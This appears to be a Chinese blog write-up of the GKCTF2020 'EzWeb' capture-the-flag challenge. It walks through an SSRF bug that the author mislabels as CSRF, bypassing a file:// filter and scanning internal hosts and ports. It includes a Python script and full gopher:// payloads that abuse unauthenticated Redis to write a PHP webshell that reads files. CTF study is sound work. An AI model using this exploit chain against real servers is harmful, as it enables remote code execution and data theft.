GKCTF2020-EZ三剑客-EzWeb

发表于2021-04-26更新于2021-04-26阅读次数

1. 首页

F12查看网页源码,发现有提示<--?secret-->

得到的源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<!--?secret-->
eth0      Link encap:Ethernet  HWaddr 02:42:0a:00:40:09  
          inet addr:10.0.64.9  Bcast:10.0.64.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1450  Metric:1
          RX packets:35 errors:0 dropped:0 overruns:0 frame:0
          TX packets:29 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:6997 (6.9 KB)  TX bytes:7218 (7.2 KB)

eth1      Link encap:Ethernet  HWaddr 52:54:00:9b:70:fe  
          inet addr:10.128.0.170  Bcast:10.128.255.255  Mask:255.255.0.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:81 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:5215 (5.2 KB)  TX bytes:0 (0.0 B)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:22 errors:0 dropped:0 overruns:0 frame:0
          TX packets:22 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:1949 (1.9 KB)  TX bytes:1949 (1.9 KB)


2. CSRF

当在IP地址栏输入baidu.com的时候,会跳转到百度页面,说明它是一个CSRF

3. 伪协议命令执行

试一下file协议读文件

1
file:///var/www/html/index.php

发现file被过滤,我们可以尝试绕过:file:/file:<空格>///

1
2
file:/var/www/html/index.php
file: ///var/www/html/index.php

F12得到index.php网页源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
function curl($url){  
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    echo curl_exec($ch);
    curl_close($ch);
}

if(isset($_GET['submit'])){
		$url = $_GET['url'];
		//echo $url."\n";
		if(preg_match('/file\:\/\/|dict|\.\.\/|127.0.0.1|localhost/is', $url,$match))
		{
			//var_dump($match);
			die('别这样');
		}
		curl($url);
}
if(isset($_GET['secret'])){
	system('ifconfig');
}
?>

4. 代码审计

1
2
3
4
5
6
7
8
9
10
if(isset($_GET['submit'])){
		$url = $_GET['url'];
		//echo $url."\n";
		if(preg_match('/file\:\/\/|dict|\.\.\/|127.0.0.1|localhost/is', $url,$match))
		{
			//var_dump($match);
			die('别这样');
		}
		curl($url);
}

从源码中可知过滤了file协议、dict协议、127.0.0.1localhost,但没有过滤http协议和gopher协议
我们使用http协议进行内网主机存活探测。用burp抓包,跑字典。

5. 爆破内网IP

对同一局域网下的IP进行扫描

这里扫到了10.0.64.6/5/7/9/11/4,这几台主机都存活,在看到10.0.64.11这台机子时给出了提示:

6. 扫描端口

扫描到6379端口,redis服务,我们利用redis未授权访问的漏洞,在根目录下生成个文件shell.php,这里的dict协议也被过滤了,所以得用gopher协议。

7. redis漏洞

大神的脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
#python2
#redis.py

import urllib
protocol="gopher://"
ip="10.0.64.11"      #运行有redis的主机ip
port="6379"
shell="\n\n\n\n"
filename="shell.php"
path="/var/www/html"
passwd=""
cmd=["flushall",
	 "set 1 {}".format(shell.replace(" ","${IFS}")),
	 "config set dir {}".format(path),
	 "config set dbfilename {}".format(filename),
	 "save"
	 ]
if passwd:
	cmd.insert(0,"AUTH {}".format(passwd))
payload=protocol+ip+":"+port+"/_"
def redis_format(arr):
	CRLF="\r\n"
	redis_arr = arr.split(" ")
	cmd=""
	cmd+="*"+str(len(redis_arr))
	for x in redis_arr:
		cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
	cmd+=CRLF
	return cmd

if __name__=="__main__":
	for x in cmd:
		payload += urllib.quote(redis_format(x))
	print payload

得到脚本:

1
gopher://10.0.64.11:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2432%0D%0A%0A%0A%3C%3Fphp%20system%28%22cat%20/flag%22%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A

将生成的payload打过去,在根目录下生成一个文件shell.php发现这样不行,payload还必须在那个代替输入,应该是编码的问题,不然直接在url里打就行了或在kali中,在那个输入框输入之后再访问10.0.64.11/shell.php

8. gopherus制造shell

工具下载:https://github.com/tarunkant/Gopherus

1
2
3
4
5
6
7
8
9
cd Gopherus-master
chmod 777 install.sh
./install.sh

gopherus --exploit redis

PHPShell              //在var/www/html目录下生成脚本

echo system("cat /flag")   //要执行的命令

生成payload:

1
gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2428%0D%0A%0A%0Aecho%20system%28%22cat%20/flag%22%29%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A